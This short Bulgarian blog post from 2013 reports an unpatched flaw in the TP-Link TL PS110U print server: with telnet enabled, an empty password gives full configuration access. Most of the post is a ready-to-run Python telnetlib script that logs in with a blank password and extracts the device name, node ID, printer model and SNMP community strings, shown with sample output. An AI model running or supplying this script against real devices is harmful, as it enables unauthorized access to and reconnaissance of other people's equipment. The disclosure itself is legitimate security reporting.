четвъртък, 20 юни 2013 г.

Дупка в TP-Link TL PS110U Print Server



При стартиран телнет сървиз атакуващият получава пълен достъп до конфигуриращите настройки. Дупката е открита от SANTHO на 19.06.2013 и до монета на тази публикация няма реакция от производителя.

Пример:

root@bt# ./tplink-enum.py 10.0.0.2
Device Name : 1P_PrintServABCD
 Node ID : AA-AA-AA-AA-AA-AA
 Manufacture: Hewlett-Packard
 Model: HP LaserJet M1005
 Community 1: public Read-Only
 Community 2: public Read-Only
import telnetlib
import sys
host = sys.argv[1]
tn = telnetlib.Telnet(host)
tn.read_until("Password:")
tn.write("\r\n")
tn.read_until("choice")
tn.write("1\r\n")
tn.read_until("choice")
tn.write("1\r\n")
data = tn.read_until("choice")
for i in data.split("\r\n"):
    if "Device Name" in i:
        print i.strip()
    if "Node ID" in i:
        print i.strip()
tn.write("0\r\n")
tn.read_until("choice")
tn.write("2\r\n")
data = tn.read_until("choice")
for i in data.split("\r\n"):
    if "Manufacture:" in i:
        print i.strip()
    if "Model:" in i:
        print i.strip()
tn.write("0\r\n")
tn.read_until("choice")
tn.write("5\r\n")
data = tn.read_until("choice")
for i in data.split("\r\n"):
    if "Community" in i:
        print i.strip()
Categories: